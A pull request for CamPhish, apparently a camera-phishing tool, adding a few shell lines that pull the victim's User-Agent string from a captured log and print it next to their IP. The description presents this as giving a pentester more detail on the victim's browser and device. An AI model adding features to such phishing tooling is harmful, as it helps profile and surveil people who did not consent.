### PR TITLE
Display user agent in terminal while running Camphish

### DIFF
--- a/camphish.sh
+++ b/camphish.sh
@@ -55,8 +55,10 @@ exit 1
 catch_ip() {
 
 ip=$(grep -a 'IP:' ip.txt | cut -d " " -f2 | tr -d '\r')
+user_agent=$(grep -a 'User-Agent:' ip.txt | cut -d " " -f2- | tr -d '\r')
 IFS=$'\n'
 printf "\e[1;93m[\e[0m\e[1;77m+\e[0m\e[1;93m] IP:\e[0m\e[1;77m %s\e[0m\n" $ip
+printf "\e[1;93m[\e[0m\e[1;77m+\e[0m\e[1;93m] User-Agent:\e[0m\e[1;77m %s\e[0m\n" $user_agent
 
 cat ip.txt >> saved.ip.txt
 


### PR DESCRIPTION
User agent helps to get more information about the victim browser and the device which they are using that eventually helps pentester to have more information about the victim